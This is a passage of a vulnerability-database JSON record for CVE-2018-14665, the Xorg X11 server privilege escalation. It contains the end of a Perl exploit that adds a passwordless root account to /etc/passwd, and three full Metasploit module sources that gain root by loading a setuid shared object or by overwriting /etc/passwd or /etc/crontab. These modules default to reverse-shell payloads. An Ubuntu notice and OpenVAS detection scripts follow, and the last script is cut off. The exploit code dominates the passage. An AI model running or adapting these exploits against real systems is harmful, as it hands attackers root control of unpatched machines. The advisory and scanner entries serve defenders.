/etc/passwd and removing /tmp/wow.ksh \\n\";\r\n$result =3D `su wow \"-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0=\r\n::/:/usr/bin/ksh' >> /etc/passwd\" && rm /tmp/wow.ksh`;\r\n\r\nprint \"[-] Done \\n\";\r\nprint \"[+] 'su wow' for root shell \\n\";", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45938"}], "metasploit": [{"lastseen": "2020-10-13T17:37:50", "description": "This module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with CentOS 7 (1708). CentOS default install will require console auth for the users session. Xorg must have SUID permissions and may not start if running. On successful exploitation artifacts will be created consistant with starting Xorg.\n", "published": "2018-11-25T21:54:37", "type": "metasploit", "title": "Xorg X11 Server SUID modulepath Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/LOCAL/XORG_X11_SUID_SERVER_MODULEPATH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::Kernel\n include Msf::Post::Linux::System\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Xorg X11 Server SUID modulepath Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges with SUID Xorg X11 server\n versions 1.19.0 < 1.20.3.\n\n A permission check flaw exists for -modulepath and -logfile options when\n starting Xorg. This allows unprivileged users that can start the server\n the ability to elevate privileges and run arbitrary code under root\n privileges.\n\n This module has been tested with CentOS 7 (1708).\n CentOS default install will require console auth for the users session.\n Xorg must have SUID permissions and may not start if running.\n\n On successful exploitation artifacts will be created consistant\n with starting Xorg.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Narendra Shinde', # Discovery and exploit\n 'Aaron Ringo', # Metasploit module\n ],\n 'DisclosureDate' => '2018-10-25',\n 'References' =>\n [\n [ 'CVE', '2018-14665' ],\n [ 'BID', '105741' ],\n [ 'EDB', '45697' ],\n [ 'EDB', '45742' ],\n [ 'EDB', '45832' ],\n [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html' ]\n ],\n 'Platform' => %w[linux unix solaris],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => %w[shell meterpreter],\n 'Targets' =>\n [\n ['Linux x64', {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X64 } ],\n ['Linux x86', {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86 } ],\n ['Solaris x86', {\n 'Platform' => [ 'solaris', 'unix' ],\n 'Arch' => ARCH_SPARC } ],\n ['Solaris x64', {\n 'Platform' => [ 'solaris', 'unix' ],\n 'Arch' => ARCH_SPARC } ],\n ],\n 'DefaultTarget' => 0))\n\n register_advanced_options(\n [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\n OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),\n OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]),\n OptString.new('sofile', [ true, 'Xorg shared object name for modulepath', 'libglx.so' ])\n ]\n )\n end\n\n\n def check\n # linux checks\n uname = cmd_exec \"uname\"\n if uname =~ /linux/i\n vprint_status \"Running additional check for Linux\"\n if datastore['ConsoleLock']\n user = cmd_exec \"id -un\"\n unless exist? \"/var/run/console/#{user}\"\n vprint_error \"No console lock for #{user}\"\n return CheckCode::Safe\n end\n vprint_good \"Console lock for #{user}\"\n end\n end\n\n # suid program check\n xorg_path = cmd_exec \"command -v Xorg\"\n unless xorg_path.include?(\"Xorg\")\n vprint_error \"Could not find Xorg executable\"\n return CheckCode::Safe\n end\n vprint_good \"Xorg path found at #{xorg_path}\"\n unless setuid? xorg_path\n vprint_error \"Xorg binary #{xorg_path} is not SUID\"\n return CheckCode::Safe\n end\n vprint_good \"Xorg binary #{xorg_path} is SUID\"\n\n x_version = cmd_exec \"Xorg -version\"\n if x_version.include?(\"Release Date\")\n v = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first)\n unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))\n vprint_error \"Xorg version #{v} not supported\"\n return CheckCode::Safe\n end\n elsif x_version.include?(\"Fatal server error\")\n vprint_error \"User probably does not have console auth\"\n vprint_error \"Below is Xorg -version output\"\n vprint_error x_version\n return CheckCode::Safe\n else\n vprint_warning \"Could not parse Xorg -version output\"\n return CheckCode::Appears\n end\n vprint_good \"Xorg version #{v} is vulnerable\"\n\n # process check for /X\n proc_list = cmd_exec \"ps ax\"\n if proc_list.include?('/X ')\n vprint_warning('Xorg in process list')\n return CheckCode::Appears\n end\n vprint_good('Xorg does not appear to be running')\n return CheckCode::Vulnerable\n end\n\n def check_arch_and_compile(path, data)\n cpu = ''\n if target['Arch'] == ARCH_X86\n cpu = Metasm::Ia32.new\n compile_with_metasm(cpu, path, data)\n elsif target['Arch'] == ARCH_SPARC\n compile_with_gcc(path, data)\n else\n cpu = Metasm::X86_64.new\n compile_with_metasm(cpu, path, data)\n end\n end\n\n def compile_with_metasm(cpu, path, data)\n shared_obj = Metasm::ELF.compile_c(cpu, data).encode_string(:lib)\n write_file(path, shared_obj)\n register_file_for_cleanup path\n\n chmod path\n rescue\n print_status('Failed to compile with Metasm. Falling back to compiling with GCC.')\n compile_with_gcc(path, data)\n end\n\n def compile_with_gcc(path, data)\n unless has_gcc?\n fail_with Failure::BadConfig, 'gcc is not installed'\n end\n vprint_good 'gcc is installed'\n\n src_path = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(6..10)}.c\"\n write_file(src_path, data)\n\n gcc_cmd = \"gcc -fPIC -shared -o #{path} #{src_path} -nostartfiles\"\n if session.type.eql? 'shell'\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\n end\n output = cmd_exec gcc_cmd\n register_file_for_cleanup src_path\n register_file_for_cleanup path\n\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{src_path} failed to compile\"\n end\n\n chmod path\n end\n\n def exploit\n check_status = check\n if check_status == CheckCode::Appears\n print_warning 'Could not get version or Xorg process possibly running, may fail'\n elsif check_status == CheckCode::Safe\n fail_with Failure::NotVulnerable, 'Target not vulnerable'\n end\n\n if is_root?\n fail_with Failure::BadConfig, 'This session already has root privileges'\n end\n\n unless writable? datastore['WritableDir']\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\n end\n\n print_good 'Passed all initial checks for exploit'\n\n modulepath = datastore['WritableDir']\n sofile = \"#{modulepath}/#{datastore['sofile']}\"\n pscript = \"#{modulepath}/.session-#{rand_text_alphanumeric 5..10}\"\n xdisplay = datastore['Xdisplay']\n\n stub = %Q^\nextern int setuid(int);\nextern int setgid(int);\nextern int system(const char *__s);\n\nvoid _init(void) __attribute__((constructor));\n\nvoid __attribute__((constructor)) _init() {\nsetgid(0);\nsetuid(0);\nsystem(\"#{pscript} &\");\n }\n ^\n print_status 'Writing launcher and compiling'\n check_arch_and_compile(sofile, stub)\n\n # Uploading\n print_status 'Uploading your payload, this could take a while'\n if payload.arch.first == 'cmd'\n write_file(pscript, payload.encoded)\n else\n write_file(pscript, generate_payload_exe)\n end\n chmod pscript\n register_file_for_cleanup pscript\n\n\n # Actual exploit with cron overwrite\n print_status 'Exploiting'\n #Xorg -logfile derp -modulepath ',/tmp' :1\n xorg_cmd = \"Xorg -modulepath ',#{modulepath}' #{xdisplay} & >/dev/null\"\n cmd_exec xorg_cmd\n Rex.sleep 7\n cmd_exec \"pkill Xorg\"\n Rex.sleep 1\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb"}, {"lastseen": "2020-10-12T04:22:08", "description": "WARNING: Successful execution of this module results in /etc/passwd being overwritten. This module is a port of the OpenBSD X11 Xorg exploit to run on AIX. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user. The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when overwriting /etc/passwd.\n", "published": "2019-02-06T11:42:40", "type": "metasploit", "title": "Xorg X11 Server Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/AIX/LOCAL/XORG_X11_SERVER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Xorg X11 Server Local Privilege Escalation',\n 'Description' => %q(\n WARNING: Successful execution of this module results in /etc/passwd being overwritten.\n\n This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.\n\n A permission check flaw exists for -modulepath and -logfile options when\n starting Xorg. This allows unprivileged users that can start the server\n the ability to elevate privileges and run arbitrary code under root\n privileges.\n\n This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.\n Due to permission restrictions of the crontab in AIX, this module does not use cron,\n and instead overwrites /etc/passwd in order to create a new user with root privileges.\n All currently logged in users need to be included when /etc/passwd is overwritten,\n else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user.\n The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,\n and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when\n overwriting /etc/passwd.\n ),\n 'Author' =>\n [\n 'Narendra Shinde', # Discovery and original FreeBSD exploit\n 'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2018-10-25',\n 'Notes' =>\n {\n 'SideEffects' => [ CONFIG_CHANGES ]\n },\n 'References' =>\n [\n ['CVE', '2018-14665'],\n ['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'],\n ['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'],\n ['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'],\n ['EDB', '45938']\n ],\n 'Platform' => ['unix'],\n 'Arch' => [ARCH_CMD],\n 'SessionTypes' => ['shell'],\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl'\n }\n },\n 'DefaultOptions' => {\n 'Payload' => 'cmd/unix/reverse_perl'\n },\n 'Targets' =>\n [\n ['IBM AIX Version 6.1', {}],\n ['IBM AIX Version 7.1', {}],\n ['IBM AIX Version 7.2', {}]\n ],\n 'DefaultTarget' => 1))\n\n register_options(\n [\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n )\n end\n\n def check\n xorg_path = cmd_exec('command -v Xorg')\n if !xorg_path.include?('Xorg')\n print_error('Could not find Xorg executable')\n return Exploit::CheckCode::Safe\n end\n\n ksh93_path = cmd_exec('command -v ksh93')\n if !ksh93_path.include?('ksh')\n print_error('Could not find Ksh93 executable')\n return Exploit::CheckCode::Safe\n end\n\n if !xorg_vulnerable?\n print_error('Xorg version is not vulnerable')\n return Exploit::CheckCode::Safe\n end\n\n return Exploit::CheckCode::Appears\n end\n\n def exploit\n status = check\n\n if status == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, '')\n end\n\n if !writable?(datastore['WritableDir'])\n fail_with(Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\")\n end\n\n xorg_path = cmd_exec('command -v Xorg')\n ksh93_path = cmd_exec('command -v ksh93')\n\n xorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir'])\n xorg_script_path = \"#{datastore['WritableDir']}/wow.ksh\"\n upload_and_chmodx(xorg_script_path, xorg_payload)\n\n passwd_backup = \"#{datastore['WritableDir']}/passwd.backup\"\n print_status(\"Backing up /etc/passwd to #{passwd_backup}\")\n cmd_exec(\"cp /etc/passwd #{passwd_backup}\")\n register_file_for_cleanup(passwd_backup)\n\n print_status(\"Executing #{xorg_script_path}\")\n cmd_exec(xorg_script_path)\n print_status('Checking if we are root')\n\n if root?\n shell_payload = %(#!#{ksh93_path}\n#{payload.encoded}\n)\n shell_script_path = \"#{datastore['WritableDir']}/wowee.ksh\"\n upload_and_chmodx(shell_script_path, shell_payload)\n\n print_status('Executing shell payload')\n cmd_exec(\"#{ksh93_path} -c \\\"echo #{shell_script_path} | su - wow &\\\"\")\n\n print_status('Restoring original /etc/passwd')\n cmd_exec(\"su - wow -c \\\"cp #{passwd_backup} /etc/passwd\\\"\")\n else\n fail_with(Failure::PayloadFailed, '')\n end\n end\n\n def generate_xorg_payload(xorg_path, ksh93_path, writabledir)\n passwd_file = read_file('/etc/passwd')\n passwd_array = passwd_file.split(\"\\n\")\n\n print_status('Retrieving currently logged in users')\n users = cmd_exec('who | cut -d\\' \\' -f1 | sort | uniq')\n users << \"\\n\"\n users_array = users.split(\"\\n\")\n\n logged_in_users = ''\n if !users_array.empty?\n users_array.each do |user|\n user << ':'\n passwd_array.each do |line|\n if line.index(user) == 0\n logged_in_users << '\\n'\n logged_in_users << line\n end\n end\n end\n end\n\n passwd_data = \"$'#{logged_in_users}\\\\nwow::0:0::/:/usr/bin/ksh\\\\n#'\"\n\n subdir_count = writabledir.count('/')\n relative_passwd = '../' * subdir_count + '../../etc/passwd'\n\n return %(#!#{ksh93_path}\n #{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1\n)\n end\n\n def xorg_vulnerable?\n version = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \\'{ print $2 }\\'')\n print_status(\"Xorg version is #{version}\")\n semantic_version = Gem::Version.new(version)\n\n vulnerable_versions = [\n ['6.1.9.0', '6.1.9.100'],\n ['7.1.4.0', '7.1.4.30'],\n ['7.1.5.0', '7.1.5.31'],\n ['7.2.0.0', '7.2.0.1'],\n ['7.2.1.0', '7.2.1.0'],\n ['7.2.2.0', '7.2.2.0'],\n ['7.2.3.0', '7.2.3.15']\n ]\n\n vulnerable_versions.each do |version_pair|\n if semantic_version >= Gem::Version.new(version_pair[0]) &&\n semantic_version <= Gem::Version.new(version_pair[1])\n return true\n end\n end\n\n return false\n end\n\n def root?\n id_output = cmd_exec('su - wow -c \"id\"')\n\n if id_output.include?('euid=0') || id_output.include?('uid=0')\n print_good('Got root!')\n return true\n end\n\n print_error('Not root')\n false\n end\n\n def upload_and_chmodx(path, data)\n print_status(\"Writing to #{path}\")\n rm_f(path)\n write_file(path, data)\n cmd_exec(\"chmod 0555 '#{path}'\")\n\n register_file_for_cleanup(path)\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/aix/local/xorg_x11_server.rb"}, {"lastseen": "2020-10-13T17:33:21", "description": "This module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS and RHEL systems requires console auth for the user's session to start the Xorg server. Cron launches the payload, so if SELinux is enforcing, exploitation may still be possible, but the module will bail. Xorg must have SUID permissions and may not start if already running. On exploitation a crontab.old backup file will be created by Xorg. This module will remove the .old file and restore crontab after successful exploitation. Failed exploitation may result in a corrupted crontab. On successful exploitation artifacts will be created consistant with starting Xorg and running a cron.\n", "published": "2018-11-11T07:43:36", "type": "metasploit", "title": "Xorg X11 Server SUID logfile Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/LOCAL/XORG_X11_SUID_SERVER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::Kernel\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Xorg X11 Server SUID logfile Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges with SUID Xorg X11 server\n versions 1.19.0 < 1.20.3.\n\n A permission check flaw exists for -modulepath and -logfile options when\n starting Xorg. This allows unprivileged users that can start the server\n the ability to elevate privileges and run arbitrary code under root\n privileges.\n\n This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and\n CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS\n and RHEL systems requires console auth for the user's session to start\n the Xorg server.\n\n Cron launches the payload, so if SELinux is enforcing, exploitation\n may still be possible, but the module will bail.\n\n Xorg must have SUID permissions and may not start if already running.\n\n On exploitation a crontab.old backup file will be created by Xorg.\n This module will remove the .old file and restore crontab after\n successful exploitation. Failed exploitation may result in a corrupted\n crontab. On successful exploitation artifacts will be created consistant\n with starting Xorg and running a cron.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Narendra Shinde', # Discovery and exploit\n 'Raptor - 0xdea', # Modified exploit for cron\n 'Aaron Ringo', # Metasploit module\n 'bcoles' # Metasploit module\n ],\n 'DisclosureDate' => '2018-10-25',\n 'References' =>\n [\n [ 'CVE', '2018-14665' ],\n [ 'BID', '105741' ],\n [ 'EDB', '45697' ],\n [ 'EDB', '45742' ],\n [ 'EDB', '45832' ],\n [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],\n [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]\n ],\n 'Platform' => %w[openbsd linux],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'SessionTypes' => %w[shell meterpreter],\n 'Targets' =>\n [\n ['OpenBSD', {\n 'Platform' => 'unix',\n 'Arch' => [ ARCH_CMD ] } ],\n ['Linux x64', {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X64 ] } ],\n ['Linux x86', {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86 ] } ]\n ],\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'cmd/unix/reverse_openssl',\n 'WfsDelay' => 120\n },\n 'DefaultTarget' => 0))\n\n register_advanced_options(\n [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\n OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),\n OptBool.new('ConsoleLock', [ true, 'Will check for console lock on linux systems', true ])\n ]\n )\n end\n\n\n def check\n\n # linux checks\n uname = cmd_exec \"uname\"\n if uname =~ /linux/i\n vprint_status \"Running additional check for Linux\"\n if datastore['ConsoleLock']\n user = cmd_exec \"id -un\"\n unless exist? \"/var/run/console/#{user}\"\n vprint_error \"No console lock for #{user}\"\n return CheckCode::Safe\n end\n vprint_good \"Console lock for #{user}\"\n end\n if selinux_installed?\n if selinux_enforcing?\n vprint_error 'Selinux is enforcing'\n return CheckCode::Safe\n end\n end\n vprint_good \"Selinux is not an issue\"\n end\n\n # suid program check\n xorg_path = cmd_exec \"command -v Xorg\"\n unless xorg_path.include?(\"Xorg\")\n vprint_error \"Could not find Xorg executable\"\n return CheckCode::Safe\n end\n vprint_good \"Xorg path found at #{xorg_path}\"\n unless setuid? xorg_path\n vprint_error \"Xorg binary #{xorg_path} is not SUID\"\n return CheckCode::Safe\n end\n vprint_good \"Xorg binary #{xorg_path} is SUID\"\n\n # version check\n x_version = cmd_exec \"Xorg -version\"\n if x_version.include?(\"Release Date\")\n v = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first)\n unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))\n vprint_error \"Xorg version #{v} not supported\"\n return CheckCode::Safe\n end\n elsif x_version.include?(\"Fatal server error\")\n vprint_error \"User probably does not have console auth\"\n vprint_error \"Below is Xorg -version output\"\n vprint_error x_version\n return CheckCode::Safe\n else\n vprint_warning \"Could not parse Xorg -version output\"\n return CheckCode::Appears\n end\n vprint_good \"Xorg version #{v} is vulnerable\"\n\n # process check for /X\n proc_list = cmd_exec \"ps ax\"\n if proc_list.include?('/X ')\n vprint_warning('Xorg in process list')\n return CheckCode::Appears\n end\n vprint_good('Xorg does not appear running')\n return CheckCode::Vulnerable\n end\n\n def on_new_session(session)\n if session.type.to_s.eql? 'meterpreter'\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\n session.sys.process.execute '/bin/sh', \"-c \\\"#{@clean_up}\\\"\"\n else\n session.shell_command(@clean_up)\n end\n print_good \"Returning session after cleaning\"\n ensure\n super\n end\n\n def exploit\n\n check_status = check\n if check_status == CheckCode::Appears\n print_warning 'Could not get version or Xorg process possibly running, may fail'\n elsif check_status == CheckCode::Safe\n fail_with Failure::NotVulnerable, 'Target not vulnerable'\n end\n\n if is_root?\n fail_with Failure::BadConfig, 'This session already has root privileges'\n end\n\n unless writable? datastore['WritableDir']\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\n end\n\n print_good 'Passed all initial checks for exploit'\n\n pscript = \"#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}\"\n @clean_up = \"/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old\"\n xdisplay = datastore['Xdisplay']\n\n # Uploading file crontab will run\n print_status 'Uploading your payload, this could take a while'\n if payload.arch.first == 'cmd'\n write_file(pscript, payload.encoded)\n else\n write_file(pscript, generate_payload_exe)\n end\n register_file_for_cleanup pscript\n chmod pscript\n\n # Exploit steps on crontab so backing it up\n cmd_exec \"cat /etc/crontab > #{pscript}.b\"\n # Actual exploit with cron overwrite\n print_status 'Trying /etc/crontab overwrite'\n cmd_exec \"cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null\"\n Rex.sleep 5\n cmd_exec \"pkill Xorg\"\n Rex.sleep 1\n cron_check = cmd_exec \"grep -F #{pscript} /etc/crontab\"\n unless cron_check.include? pscript\n rm_f \"#{pscript}.b\"\n print_error 'Deleting crontab backup'\n fail_with Failure::NotVulnerable, '/etc/crontab not modified'\n end\n print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/local/xorg_x11_suid_server.rb"}], "ubuntu": [{"lastseen": "2020-07-02T11:38:04", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "Narendra Shinde discovered that the X.Org X server incorrectly handled \ncertain command line parameters when running as root with the legacy \nwrapper. When certain graphics drivers are being used, a local attacker \ncould possibly use this issue to overwrite arbitrary files and escalate \nprivileges.", "edition": 4, "modified": "2018-10-26T00:00:00", "published": "2018-10-26T00:00:00", "id": "USN-3802-1", "href": "https://ubuntu.com/security/notices/USN-3802-1", "title": "X.Org X server vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-03-14T16:50:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-13T00:00:00", "published": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562311220201236", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201236", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2020-1236)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1236\");\n script_version(\"2020-03-13T07:17:23+0000\");\n script_cve_id(\"CVE-2018-14665\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 07:17:23 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-13 07:17:23 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2020-1236)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.2\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1236\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1236\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'xorg-x11-server' package(s) announced via the EulerOS-SA-2020-1236 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An incorrect permission check for -modulepath and -logfile options when starting Xorg X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.(CVE-2018-14665)\");\n\n script_tag(name:\"affected\", value:\"'xorg-x11-server' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.2.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.2.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.19.5~5.h7\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.19.5~5.h7\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:34:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192553", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192553", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2019-2553)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 